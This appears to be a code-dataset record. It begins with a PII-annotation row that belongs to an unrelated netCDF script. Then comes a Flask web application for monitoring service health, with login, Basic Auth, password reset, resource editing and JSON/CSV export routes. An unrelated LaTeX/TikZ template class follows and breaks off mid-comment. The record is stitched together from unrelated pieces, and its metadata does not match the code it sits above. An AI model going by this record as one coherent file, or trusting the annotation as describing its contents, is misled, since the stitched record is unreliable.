| 2,388 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', "Trond Kristiansen'"], ['DATE_TIME', 'years'], ['PERSON', 'lat'], ['PERSON', 'mydata'], ['LOCATION', 'mydataanomaly'], ['LOCATION', 'outfilename'], ['PERSON', 'netcdf'], ['PERSON', 'myformat'], ['PERSON', 'f1.source'], ['PERSON', 'Trond Kristiansen'], ['PERSON', "f1.createDimension('x"], ['DATE_TIME', "'Years'"], ['DATE_TIME', "'Years'"], ['PERSON', 'mydata\n \n f1.close'], ['URL', 'email.com'], ['URL', 'extractIce.py'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'f1.de'], ['URL', 'datetime.no'], ['URL', 'f1.so'], ['URL', 'email.com'], ['URL', 'iceExtract.py'], ['URL', 'f1.Co'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'vnc.st'], ['URL', 'f1.cr'], ['URL', 'time.fi'], ['URL', 'f1.cr'], ['URL', 'temp.fi'], ['URL', 'f1.va'], ['URL', 'f1.cl']] |
31 | # =================================================================
#
# Authors: Tom Kralidis dummy@email.com
# Just van den Broecke dummy@email.com
#
# Copyright (c) 2014 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import base64
import csv
import json
import logging
from io import StringIO
from flask import (abort, flash, g, jsonify, redirect,
render_template, request, url_for)
from flask_babel import gettext
from flask_login import (LoginManager, login_user, logout_user,
current_user, login_required)
from flask_migrate import Migrate
from itertools import chain
import views
from __init__ import __version__
from enums import RESOURCE_TYPES
from factory import Factory
from init import App
from models import Resource, Run, ProbeVars, CheckVars, Tag, User, Recipient
from resourceauth import ResourceAuth
from util import send_email, geocode, format_checked_datetime, \
format_run_status, format_obj_value
# Module globals for convenience
LOGGER = logging.getLogger(__name__)
APP = App.get_app()
CONFIG = App.get_config()
DB = App.get_db()
BABEL = App.get_babel()
MIGRATE = Migrate(APP, DB)
LOGIN_MANAGER = LoginManager()
LOGIN_MANAGER.init_app(APP)
LANGUAGES = (
('en', 'English'),
('fr', 'Français'),
('de', 'German'),
('nl_NL', 'Nederlands (Nederland)'),
('es_BO', 'Español (Bolivia)'),
('hr_HR', 'Croatian (Croatia)')
)
# Should GHC Runner be run within GHC webapp?
if CONFIG['GHC_RUNNER_IN_WEBAPP'] is True:
LOGGER.info('Running GHC Scheduler in WebApp')
from scheduler import start_schedule
# Start scheduler
start_schedule()
else:
LOGGER.info('NOT Running GHC Scheduler in WebApp')
# commit or rollback shorthand
def db_commit():
err = None
try:
DB.session.commit()
except Exception:
DB.session.rollback()
# finally:
# DB.session.close()
return err
@APP.before_request
def before_request():
g.user = current_user
if request.args and 'lang' in request.args and request.args['lang'] != '':
g.current_lang = request.args['lang']
if not hasattr(g, 'current_lang'):
g.current_lang = 'en'
if CONFIG['GHC_REQUIRE_WEBAPP_AUTH'] is True:
# Login is required to access GHC Webapp.
# We need to pass-through static resources like CSS.
if any(['/static/' in request.path,
request.path.endswith('.ico'),
g.user.is_authenticated(), # This is from Flask-Login
(request.endpoint is not None
and getattr(APP.view_functions[request.endpoint],
'is_public', False))]):
return # Access granted
else:
return redirect(url_for('login'))
# Marks (endpoint-) function as always to be accessible
# (used for GHC_REQUIRE_WEBAPP_AUTH)
def public_route(decorated_function):
decorated_function.is_public = True
return decorated_function
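# Usage sketch: marking a view public bypasses the GHC_REQUIRE_WEBAPP_AUTH
# gate in before_request() above (the route below is hypothetical):
#
#     @APP.route('/ping')
#     @public_route
#     def ping():
#         return 'pong'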
@APP.teardown_appcontext
def shutdown_session(exception=None):
DB.session.remove()
@BABEL.localeselector
def get_locale():
return g.get('current_lang', 'en')
# return request.accept_languages.best_match(LANGUAGES.keys())
@LOGIN_MANAGER.user_loader
def load_user(identifier):
return User.query.get(int(identifier))
@LOGIN_MANAGER.unauthorized_handler
def unauthorized_callback():
if request.query_string:
url = '%s%s?%s' % (request.script_root, request.path,
request.query_string)
else:
url = '%s%s' % (request.script_root, request.path)
return redirect(url_for('login', lang=g.current_lang, next=url))
@LOGIN_MANAGER.request_loader
def load_user_from_request(request):
# Try to login using Basic Auth
# Inspiration: https://flask-login.readthedocs.io
# /en/latest/#custom-login-using-request-loader
basic_auth_val = request.headers.get('Authorization')
if basic_auth_val:
basic_auth_val = basic_auth_val.replace('Basic ', '', 1)
authenticated = False
try:
            username, password = base64.b64decode(
                basic_auth_val).decode('utf-8').split(':')
user = User.query.filter_by(username=username).first()
if user:
authenticated = user.authenticate(password)
finally:
# Ignore errors, they should all fail the auth attempt
pass
if not authenticated:
LOGGER.warning('Unauthorized access for user=%s' % username)
abort(401)
else:
return user
# TODO: may add login via api-key or token here
# finally, return None if both methods did not login the user
return None
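# Request sketch for the Basic Auth path above (placeholder credentials):
#
#     Authorization: Basic <base64 of "username:password">
#
# or, with curl against a deployed instance:
#
#     curl -u username:password https://example.org/api/v1.0/summary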
@APP.template_filter('cssize_reliability')
def cssize_reliability(value, css_type=None):
"""returns CSS button class snippet based on score"""
number = int(value)
if CONFIG['GHC_RELIABILITY_MATRIX']['red']['min'] <= number <= \
CONFIG['GHC_RELIABILITY_MATRIX']['red']['max']:
score = 'danger'
panel = 'red'
elif (CONFIG['GHC_RELIABILITY_MATRIX']['orange']['min'] <= number <=
CONFIG['GHC_RELIABILITY_MATRIX']['orange']['max']):
score = 'warning'
panel = 'yellow'
elif (CONFIG['GHC_RELIABILITY_MATRIX']['green']['min'] <= number <=
CONFIG['GHC_RELIABILITY_MATRIX']['green']['max']):
score = 'success'
panel = 'green'
else: # should never really get here
score = 'info'
panel = 'blue'
if css_type is not None and css_type == 'panel':
return panel
else:
return score
@APP.template_filter('cssize_reliability2')
def cssize_reliability2(value):
"""returns CSS panel class snippet based on score"""
return cssize_reliability(value, 'panel')
@APP.template_filter('round2')
def round2(value):
"""rounds a number to 2 decimal places except for values of 0 or 100"""
if value in [0.0, 100.0]:
return int(value)
return round(value, 2)
@APP.context_processor
def context_processors():
"""global context processors for templates"""
rtc = views.get_resource_types_counts()
tags = views.get_tag_counts()
return {
'app_version': __version__,
'resource_types': RESOURCE_TYPES,
'resource_types_counts': rtc['counts'],
'resources_total': rtc['total'],
'languages': LANGUAGES,
'tags': tags,
'tagnames': list(tags.keys())
}
@APP.route('/')
def home():
"""homepage"""
response = views.get_health_summary()
return render_template('home.html', response=response)
@APP.route('/csv', endpoint='csv')
@APP.route('/json', endpoint='json')
def export():
"""export resource list as JSON"""
resource_type = None
if request.args.get('resource_type') in RESOURCE_TYPES.keys():
resource_type = request.args['resource_type']
query = request.args.get('q')
response = views.list_resources(resource_type, query)
if request.url_rule.rule == '/json':
json_dict = {'total': response['total'], 'resources': []}
for r in response['resources']:
try:
ghc_url = '%s/resource/%s' % \
(CONFIG['GHC_SITE_URL'], r.identifier)
last_run_report = '-'
if r.last_run:
last_run_report = r.last_run.report
json_dict['resources'].append({
'resource_type': r.resource_type,
'title': r.title,
'url': r.url,
'ghc_url': ghc_url,
'ghc_json': '%s/json' % ghc_url,
'ghc_csv': '%s/csv' % ghc_url,
'first_run': format_checked_datetime(r.first_run),
'last_run': format_checked_datetime(r.last_run),
'status': format_run_status(r.last_run),
'min_response_time': round(r.min_response_time, 2),
'average_response_time': round(r.average_response_time, 2),
'max_response_time': round(r.max_response_time, 2),
'reliability': round(r.reliability, 2),
'last_report': format_obj_value(last_run_report)
})
except Exception as e:
LOGGER.warning(
'JSON error resource id=%d: %s' % (r.identifier, str(e)))
return jsonify(json_dict)
elif request.url_rule.rule == '/csv':
output = StringIO()
writer = csv.writer(output)
header = [
'resource_type', 'title', 'url', 'ghc_url', 'ghc_json', 'ghc_csv',
'first_run', 'last_run', 'status', 'min_response_time',
'average_response_time', 'max_response_time', 'reliability'
]
writer.writerow(header)
for r in response['resources']:
try:
ghc_url = '%s%s' % (CONFIG['GHC_SITE_URL'],
url_for('get_resource_by_id',
identifier=r.identifier))
writer.writerow([
r.resource_type,
r.title,
r.url,
ghc_url,
'%s/json' % ghc_url,
'%s/csv' % ghc_url,
format_checked_datetime(r.first_run),
format_checked_datetime(r.last_run),
format_run_status(r.last_run),
round(r.min_response_time, 2),
round(r.average_response_time, 2),
round(r.max_response_time, 2),
round(r.reliability, 2)
])
except Exception as e:
LOGGER.warning(
'CSV error resource id=%d: %s' % (r.identifier, str(e)))
return output.getvalue(), 200, {'Content-type': 'text/csv'}
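# Response sketch for GET /json (field values are illustrative):
#
#     {"total": 1,
#      "resources": [{"resource_type": "OGC:WMS", "title": "...",
#                     "url": "...", "ghc_url": "...", "status": "...",
#                     "reliability": 99.5, ...}]}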
@APP.route('/opensearch')
def opensearch():
"""generate OpenSearch description document"""
content = render_template('opensearch_description.xml')
return content, 200, {'Content-type': 'text/xml'}
@APP.route('/resource/<identifier>/csv', endpoint='csv-resource')
@APP.route('/resource/<identifier>/json', endpoint='json-resource')
def export_resource(identifier):
"""export resource as JSON or CSV"""
resource = views.get_resource_by_id(identifier)
history_csv = '%s/resource/%s/history/csv' % (CONFIG['GHC_SITE_URL'],
resource.identifier)
history_json = '%s/resource/%s/history/json' % (CONFIG['GHC_SITE_URL'],
resource.identifier)
if 'json' in request.url_rule.rule:
last_run_report = '-'
if resource.last_run:
last_run_report = resource.last_run.report
json_dict = {
'identifier': resource.identifier,
'title': resource.title,
'url': resource.url,
'resource_type': resource.resource_type,
'owner': resource.owner.username,
'min_response_time': resource.min_response_time,
'average_response_time': resource.average_response_time,
'max_response_time': resource.max_response_time,
'reliability': resource.reliability,
'status': format_run_status(resource.last_run),
'first_run': format_checked_datetime(resource.first_run),
'last_run': format_checked_datetime(resource.last_run),
'history_csv': history_csv,
'history_json': history_json,
'last_report': format_obj_value(last_run_report)
}
return jsonify(json_dict)
elif 'csv' in request.url_rule.rule:
output = StringIO()
writer = csv.writer(output)
header = [
'identifier', 'title', 'url', 'resource_type', 'owner',
'min_response_time', 'average_response_time', 'max_response_time',
'reliability', 'status', 'first_run', 'last_run', 'history_csv',
'history_json'
]
writer.writerow(header)
writer.writerow([
resource.identifier,
resource.title,
resource.url,
resource.resource_type,
resource.owner.username,
resource.min_response_time,
resource.average_response_time,
resource.max_response_time,
resource.reliability,
format_run_status(resource.last_run),
format_checked_datetime(resource.first_run),
format_checked_datetime(resource.last_run),
history_csv,
history_json
])
return output.getvalue(), 200, {'Content-type': 'text/csv'}
@APP.route('/resource/<identifier>/history/csv',
endpoint='csv-resource-history')
@APP.route('/resource/<identifier>/history/json',
endpoint='json-resource-history')
def export_resource_history(identifier):
"""export resource history as JSON or CSV"""
resource = views.get_resource_by_id(identifier)
if 'json' in request.url_rule.rule:
json_dict = {'runs': []}
for run in resource.runs:
json_dict['runs'].append({
'owner': resource.owner.username,
'resource_type': resource.resource_type,
'checked_datetime': format_checked_datetime(run),
'title': resource.title,
'url': resource.url,
'response_time': round(run.response_time, 2),
'status': format_run_status(run)
})
return jsonify(json_dict)
elif 'csv' in request.url_rule.rule:
output = StringIO()
writer = csv.writer(output)
header = [
'owner', 'resource_type', 'checked_datetime', 'title', 'url',
'response_time', 'status'
]
writer.writerow(header)
for run in resource.runs:
writer.writerow([
resource.owner.username,
resource.resource_type,
format_checked_datetime(run),
resource.title,
resource.url,
round(run.response_time, 2),
format_run_status(run),
])
return output.getvalue(), 200, {'Content-type': 'text/csv'}
@APP.route('/settings')
def settings():
"""settings"""
pass
@APP.route('/resources')
def resources():
"""lists resources with optional filter"""
resource_type = None
if request.args.get('resource_type') in RESOURCE_TYPES.keys():
resource_type = request.args['resource_type']
tag = request.args.get('tag')
query = request.args.get('q')
response = views.list_resources(resource_type, query, tag)
return render_template('resources.html', response=response)
@APP.route('/resource/<identifier>')
def get_resource_by_id(identifier):
"""show resource"""
response = views.get_resource_by_id(identifier)
return render_template('resource.html', resource=response)
@APP.route('/register', methods=['GET', 'POST'])
def register():
"""register a new user"""
if not CONFIG['GHC_SELF_REGISTER']:
msg1 = gettext('This site is not configured for self-registration')
msg2 = gettext('Please contact')
msg = '%s. %s %s' % (msg1, msg2,
CONFIG['GHC_ADMIN_EMAIL'])
flash('%s' % msg, 'danger')
return render_template('register.html', errmsg=msg)
if request.method == 'GET':
return render_template('register.html')
# Check for existing user or email
user = User.query.filter_by(username=request.form['username']).first()
email = User.query.filter_by(email=request.form['email']).first()
if user or email:
flash('%s' % gettext('Invalid username or email'), 'danger')
return render_template('register.html')
user = User(request.form['username'],
request.form['password'], request.form['email'])
DB.session.add(user)
try:
DB.session.commit()
except Exception as err:
DB.session.rollback()
bad_column = err.message.split()[2]
bad_value = request.form[bad_column]
msg = gettext('already registered')
flash('%s %s %s' % (bad_column, bad_value, msg), 'danger')
return redirect(url_for('register', lang=g.current_lang))
return redirect(url_for('login', lang=g.current_lang))
@APP.route('/add', methods=['GET', 'POST'])
@login_required
def add():
"""add resource"""
if not g.user.is_authenticated():
return render_template('add.html')
if request.method == 'GET':
return render_template('add.html')
resource_type = request.form['resource_type']
tags = request.form.getlist('tags')
url = request.form['url'].strip()
resources_to_add = []
from healthcheck import sniff_test_resource, run_test_resource
sniffed_resources = sniff_test_resource(CONFIG, resource_type, url)
if not sniffed_resources:
msg = gettext("No resources detected")
        LOGGER.error(msg)
flash(msg, 'danger')
for (resource_type, resource_url,
title, success, response_time,
message, start_time, resource_tags,) in sniffed_resources:
tags_to_add = []
for tag in chain(tags, resource_tags):
tag_obj = tag
if not isinstance(tag, Tag):
tag_obj = Tag.query.filter_by(name=tag).first()
if tag_obj is None:
tag_obj = Tag(name=tag)
tags_to_add.append(tag_obj)
resource_to_add = Resource(current_user,
resource_type,
title,
resource_url,
tags=tags_to_add)
resources_to_add.append(resource_to_add)
probe_to_add = None
checks_to_add = []
# Always add a default Probe and Check(s)
# from the GHC_PROBE_DEFAULTS conf
if resource_type in CONFIG['GHC_PROBE_DEFAULTS']:
resource_settings = CONFIG['GHC_PROBE_DEFAULTS'][resource_type]
probe_class = resource_settings['probe_class']
if probe_class:
# Add the default Probe
probe_obj = Factory.create_obj(probe_class)
probe_to_add = ProbeVars(
resource_to_add, probe_class,
probe_obj.get_default_parameter_values())
# Add optional default (parameterized)
# Checks to add to this Probe
checks_info = probe_obj.get_checks_info()
checks_param_info = probe_obj.get_plugin_vars()['CHECKS_AVAIL']
for check_class in checks_info:
check_param_info = checks_param_info[check_class]
if 'default' in checks_info[check_class]:
if checks_info[check_class]['default']:
# Filter out params for Check with fixed values
param_defs = check_param_info['PARAM_DEFS']
param_vals = {}
for param in param_defs:
if param_defs[param]['value']:
param_vals[param] = \
param_defs[param]['value']
check_vars = CheckVars(
probe_to_add, check_class, param_vals)
checks_to_add.append(check_vars)
result = run_test_resource(resource_to_add)
run_to_add = Run(resource_to_add, result)
DB.session.add(resource_to_add)
# prepopulate notifications for current user
resource_to_add.set_recipients('email', [g.user.email])
if probe_to_add:
DB.session.add(probe_to_add)
for check_to_add in checks_to_add:
DB.session.add(check_to_add)
DB.session.add(run_to_add)
try:
DB.session.commit()
msg = gettext('Services registered')
flash('%s (%s, %s)' % (msg, resource_type, url), 'success')
except Exception as err:
DB.session.rollback()
flash(str(err), 'danger')
return redirect(url_for('home', lang=g.current_lang))
if len(resources_to_add) == 1:
return edit_resource(resources_to_add[0].identifier)
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/resource/<int:resource_identifier>/update', methods=['POST'])
@login_required
def update(resource_identifier):
"""update a resource"""
update_counter = 0
status = 'success'
try:
resource_identifier_dict = request.get_json()
resource = Resource.query.filter_by(
identifier=resource_identifier).first()
for key, value in resource_identifier_dict.items():
if key == 'tags':
resource_tags = [t.name for t in resource.tags]
tags_to_add = set(value) - set(resource_tags)
tags_to_delete = set(resource_tags) - set(value)
# Existing Tags: create relation else add new Tag
all_tag_objs = Tag.query.all()
for tag in tags_to_add:
tag_add_obj = None
for tag_obj in all_tag_objs:
if tag == tag_obj.name:
# use existing
tag_add_obj = tag_obj
break
if not tag_add_obj:
# add new
tag_add_obj = Tag(name=tag)
DB.session.add(tag_add_obj)
resource.tags.append(tag_add_obj)
for tag in tags_to_delete:
tag_to_delete = Tag.query.filter_by(name=tag).first()
resource.tags.remove(tag_to_delete)
update_counter += 1
elif key == 'probes':
# Remove all existing ProbeVars for Resource
for probe_var in resource.probe_vars:
resource.probe_vars.remove(probe_var)
# Add ProbeVars anew each with optional CheckVars
for probe in value:
LOGGER.info('adding Probe class=%s parms=%s' %
(probe['probe_class'], str(probe)))
probe_vars = ProbeVars(resource, probe['probe_class'],
probe['parameters'])
for check in probe['checks']:
check_vars = CheckVars(
probe_vars, check['check_class'],
check['parameters'])
probe_vars.check_vars.append(check_vars)
resource.probe_vars.append(probe_vars)
update_counter += 1
elif key == 'notify_emails':
resource.set_recipients('email',
[v for v in value if v.strip()])
elif key == 'notify_webhooks':
resource.set_recipients('webhook',
[v for v in value if v.strip()])
elif key == 'auth':
resource.auth = value
elif getattr(resource, key) != resource_identifier_dict[key]:
# Update other resource attrs, mainly 'name'
setattr(resource, key, resource_identifier_dict[key])
min_run_freq = CONFIG['GHC_MINIMAL_RUN_FREQUENCY_MINS']
if int(resource.run_frequency) < min_run_freq:
resource.run_frequency = min_run_freq
update_counter += 1
        # Always update geo-IP: geocoding may have failed on creation,
        # or the IP address behind the URL may have changed.
latitude, longitude = geocode(resource.url)
if latitude != 0.0 and longitude != 0.0:
# Only update for valid lat/lon
resource.latitude = latitude
resource.longitude = longitude
update_counter += 1
except Exception as err:
LOGGER.error("Cannot update resource: %s", err, exc_info=err)
DB.session.rollback()
status = str(err)
update_counter = 0
# finally:
# DB.session.close()
if update_counter > 0:
err = db_commit()
if err:
status = str(err)
return jsonify({'status': status})
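# Illustrative JSON body for POST /resource/<id>/update; the keys match
# the branches handled above, the values are made up:
#
#     {"tags": ["demo", "wms"],
#      "notify_emails": ["ops@example.org"],
#      "run_frequency": 60,
#      "auth": null}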
@APP.route('/resource/<int:resource_identifier>/test', methods=['GET', 'POST'])
@login_required
def test(resource_identifier):
"""test a resource"""
resource = Resource.query.filter_by(identifier=resource_identifier).first()
if resource is None:
flash(gettext('Resource not found'), 'danger')
return redirect(request.referrer)
from healthcheck import run_test_resource
result = run_test_resource(
resource)
if request.method == 'GET':
if result.message == 'Skipped':
msg = gettext('INFO')
flash('%s: %s' % (msg, result.message), 'info')
elif result.message not in ['OK', None, 'None']:
msg = gettext('ERROR')
flash('%s: %s' % (msg, result.message), 'danger')
else:
flash(gettext('Resource tested successfully'), 'success')
return redirect(url_for('get_resource_by_id', lang=g.current_lang,
identifier=resource_identifier))
elif request.method == 'POST':
return jsonify(result.get_report())
@APP.route('/resource/<int:resource_identifier>/edit')
@login_required
def edit_resource(resource_identifier):
"""edit a resource"""
resource = Resource.query.filter_by(identifier=resource_identifier).first()
if resource is None:
flash(gettext('Resource not found'), 'danger')
return redirect(request.referrer)
probes_avail = views.get_probes_avail(resource.resource_type, resource)
suggestions = json.dumps(Recipient.get_suggestions('email',
g.user.username))
return render_template('edit_resource.html',
lang=g.current_lang,
resource=resource,
suggestions=suggestions,
auths_avail=ResourceAuth.get_auth_defs(),
probes_avail=probes_avail)
@APP.route('/resource/<int:resource_identifier>/delete')
@login_required
def delete(resource_identifier):
"""delete a resource"""
resource = Resource.query.filter_by(identifier=resource_identifier).first()
if g.user.role != 'admin' and g.user.username != resource.owner.username:
msg = gettext('You do not have access to delete this resource')
flash(msg, 'danger')
return redirect(url_for('get_resource_by_id', lang=g.current_lang,
identifier=resource_identifier))
if resource is None:
flash(gettext('Resource not found'), 'danger')
return redirect(url_for('home', lang=g.current_lang))
resource.clear_recipients()
DB.session.delete(resource)
try:
DB.session.commit()
flash(gettext('Resource deleted'), 'success')
return redirect(url_for('home', lang=g.current_lang))
except Exception as err:
DB.session.rollback()
flash(str(err), 'danger')
return redirect(url_for(request.referrer))
@APP.route('/probe/<string:probe_class>/<int:resource_identifier>/edit_form')
@APP.route('/probe/<string:probe_class>/edit_form')
@login_required
def get_probe_edit_form(probe_class, resource_identifier=None):
"""get the form to edit a Probe"""
probe_obj = Factory.create_obj(probe_class)
if resource_identifier:
resource = views.get_resource_by_id(resource_identifier)
if resource:
probe_obj._resource = resource
probe_obj.expand_params(resource)
probe_info = probe_obj.get_plugin_vars()
probe_vars = ProbeVars(
None, probe_class, probe_obj.get_default_parameter_values())
# Get only the default Checks for this Probe class
checks_avail = probe_obj.get_checks_info_defaults()
checks_avail = probe_obj.expand_check_vars(checks_avail)
for check_class in checks_avail:
check_obj = Factory.create_obj(check_class)
check_params = check_obj.get_default_parameter_values()
probe_check_param_defs = \
probe_info['CHECKS_AVAIL'][check_class]['PARAM_DEFS']
for param in probe_check_param_defs:
if 'value' in probe_check_param_defs[param]:
check_params[param] = probe_check_param_defs[param]['value']
# Appends 'check_vars' to 'probe_vars' (SQLAlchemy)
CheckVars(probe_vars, check_class, check_params)
return render_template('includes/probe_edit_form.html',
lang=g.current_lang,
probe=probe_vars, probe_info=probe_info)
@APP.route('/check/<string:check_class>/edit_form')
@login_required
def get_check_edit_form(check_class):
"""get the form to edit a Check"""
check_obj = Factory.create_obj(check_class)
check_info = check_obj.get_plugin_vars()
check_vars = CheckVars(
None, check_class, check_obj.get_default_parameter_values())
return render_template('includes/check_edit_form.html',
lang=g.current_lang,
check=check_vars, check_info=check_info)
@APP.route('/login', methods=['GET', 'POST'])
@public_route
def login():
"""login"""
if request.method == 'GET':
return render_template('login.html')
username = request.form['username']
password = request.form['password']
registered_user = User.query.filter_by(username=username).first()
authenticated = False
if registered_user:
# May not have upgraded to pw encryption: warn
if len(registered_user.password) < 80:
msg = 'Please upgrade GHC to encrypted passwords first, see docs!'
flash(gettext(msg), 'danger')
return redirect(url_for('login', lang=g.current_lang))
try:
authenticated = registered_user.authenticate(password)
finally:
pass
if not authenticated:
flash(gettext('Invalid username and / or password'), 'danger')
return redirect(url_for('login', lang=g.current_lang))
# Login ok
login_user(registered_user)
if 'next' in request.args:
return redirect(request.args.get('next'))
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/logout')
def logout():
"""logout"""
logout_user()
flash(gettext('Logged out'), 'success')
if request.referrer:
return redirect(request.referrer)
else:
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/reset_req', methods=['GET', 'POST'])
@public_route
def reset_req():
"""
Reset password request handling.
"""
if request.method == 'GET':
return render_template('reset_password_request.html')
# Reset request form with email
email = request.form['email']
registered_user = User.query.filter_by(email=email).first()
if registered_user is None:
LOGGER.warn('Invalid email for reset_req: %s' % email)
flash(gettext('Invalid email'), 'danger')
return redirect(url_for('reset_req', lang=g.current_lang))
# Generate reset url using user-specific token
token = registered_user.get_token()
reset_url = '%s/reset/%s' % (CONFIG['GHC_SITE_URL'], token)
# Create message body with reset link
msg_body = render_template('reset_password_email.txt',
lang=g.current_lang, config=CONFIG,
reset_url=reset_url,
username=registered_user.username)
try:
from email.mime.text import MIMEText
from email.utils import formataddr
msg = MIMEText(msg_body, 'plain', 'utf-8')
msg['From'] = formataddr((CONFIG['GHC_SITE_TITLE'],
CONFIG['GHC_ADMIN_EMAIL']))
msg['To'] = registered_user.email
msg['Subject'] = '[%s] %s' % (CONFIG['GHC_SITE_TITLE'],
gettext('reset password'))
from_addr = '%s <%s>' % (CONFIG['GHC_SITE_TITLE'],
CONFIG['GHC_ADMIN_EMAIL'])
to_addr = registered_user.email
msg_text = msg.as_string()
send_email(CONFIG['GHC_SMTP'], from_addr, to_addr, msg_text)
except Exception as err:
msg = 'Cannot send email. Contact admin: '
LOGGER.warn(msg + ' err=' + str(err))
flash(gettext(msg) + CONFIG['GHC_ADMIN_EMAIL'], 'danger')
return redirect(url_for('login', lang=g.current_lang))
flash(gettext('Password reset link sent via email'), 'success')
if 'next' in request.args:
return redirect(request.args.get('next'))
return redirect(url_for('home', lang=g.current_lang))
@APP.route('/reset/<token>', methods=['GET', 'POST'])
@public_route
def reset(token=None):
"""
Reset password submit form handling.
"""
# Must have at least a token to proceed.
if token is None:
return redirect(url_for('reset_req', lang=g.current_lang))
# Token received: verify if ok, may also time-out.
registered_user = User.verify_token(token)
if registered_user is None:
LOGGER.warn('Cannot find User from token: %s' % token)
flash(gettext('Invalid token'), 'danger')
return redirect(url_for('login', lang=g.current_lang))
# Token and user ok: return reset form.
if request.method == 'GET':
return render_template('reset_password_form.html')
# Valid token and user: change password from form-value
password = request.form['password']
if not password:
flash(gettext('Password required'), 'danger')
return redirect(url_for('reset/%s' % token, lang=g.current_lang))
registered_user.set_password(password)
DB.session.add(registered_user)
try:
DB.session.commit()
flash(gettext('Update password OK'), 'success')
except Exception as err:
msg = 'Update password failed!'
LOGGER.warn(msg + ' err=' + str(err))
DB.session.rollback()
flash(gettext(msg), 'danger')
# Finally redirect user to login page
return redirect(url_for('login', lang=g.current_lang))
#
# REST Interface Calls
#
@APP.route('/api/v1.0/summary')
@APP.route('/api/v1.0/summary/')
@APP.route('/api/v1.0/summary.<content_type>')
def api_summary(content_type='json'):
"""
Get health summary for all Resources within this instance.
"""
health_summary = views.get_health_summary()
# Convert Runs to dict-like structure
for run in ['first_run', 'last_run']:
run_obj = health_summary.get(run, None)
if run_obj:
health_summary[run] = run_obj.for_json()
# Convert Resources failing to dict-like structure
failed_resources = []
for resource in health_summary['failed_resources']:
failed_resources.append(resource.for_json())
health_summary['failed_resources'] = failed_resources
if content_type == 'json':
result = jsonify(health_summary)
else:
result = '<pre>\n%s\n</pre>' % \
render_template('status_report_email.txt',
lang=g.current_lang, summary=health_summary)
return result
@APP.route('/api/v1.0/probes-avail/')
@APP.route('/api/v1.0/probes-avail/<resource_type>')
@APP.route('/api/v1.0/probes-avail/<resource_type>/<int:resource_id>')
def api_probes_avail(resource_type=None, resource_id=None):
"""
Get available (configured) Probes for this
installation, optional for resource type
"""
resource = None
if resource_id:
resource = views.get_resource_by_id(resource_id)
probes = views.get_probes_avail(resource_type=resource_type,
resource=resource)
return jsonify(probes)
@APP.route('/api/v1.0/runs/<int:resource_id>')
@APP.route('/api/v1.0/runs/<int:resource_id>.<content_type>')
@APP.route('/api/v1.0/runs/<int:resource_id>/<int:run_id>')
@APP.route('/api/v1.0/runs/<int:resource_id>/<int:run_id>.<content_type>')
def api_runs(resource_id, run_id=None, content_type='json'):
"""
Get Runs (History of results) for Resource.
"""
if run_id:
runs = [views.get_run_by_id(run_id)]
else:
runs = views.get_run_by_resource_id(resource_id)
run_arr = []
for run in runs:
run_dict = {
'id': run.identifier,
'success': run.success,
'response_time': run.response_time,
'checked_datetime': run.checked_datetime,
'message': run.message,
'report': run.report
}
run_arr.append(run_dict)
runs_dict = {'total': len(run_arr), 'runs': run_arr}
result = 'unknown'
if content_type == 'json':
result = jsonify(runs_dict)
elif content_type == 'html':
result = render_template('includes/runs.html',
lang=g.current_lang, runs=runs_dict['runs'])
return result
if __name__ == '__main__': # run locally, for fun
import sys
HOST = '127.0.0.1'
PORT = 8000
if len(sys.argv) > 1:
HOST, PORT = sys.argv[1].split(':')
APP.run(host=HOST, port=int(PORT), use_reloader=True, debug=True)
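# Launch sketch (module name depends on where this file lives):
#
#     python app.py              # serves on 127.0.0.1:8000
#     python app.py 0.0.0.0:8080 # override host:port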

# Copyright 2012 (C) Mickael Menu dummy@email.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
from string import Template
from .tags import *
class FileTemplate(object):
"""
The file template tool generates a full LaTeX/TikZ source from a template, preamble
and source.
"""
def __init__(self, template, preamble, source):
assert preamble is not None and source is not None
super(FileTemplate, self).__init__()
self.content = ""
self.preamble = preamble
self.source = source
self.latex_template = Template(template)
def buildFileContent(self):
"""
Builds the TikZ document with given preamble and source and the document template.
"""
self._buildPreambleChunk()
self._buildSourceChunk()
self._buildContentFromTemplate()
return self.content
def _buildPreambleChunk(self):
self.preamble = "%s\n%s\n%s\n" % (PREAMBLE_BEGIN_TAG, self.preamble, PREAMBLE_END_TAG)
def _buildSourceChunk(self):
self.source = "%s\n%s\n%s\n" % (SOURCE_BEGIN_TAG, self.source, SOURCE_END_TAG)
def _buildContentFromTemplate(self):
self.content = TIKZ_TAG + "\n"
self.content += self.latex_template.safe_substitute(PREAMBLE=self.preamble, SOURCE=self.source)
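
# A minimal usage sketch (hypothetical template text, not part of this
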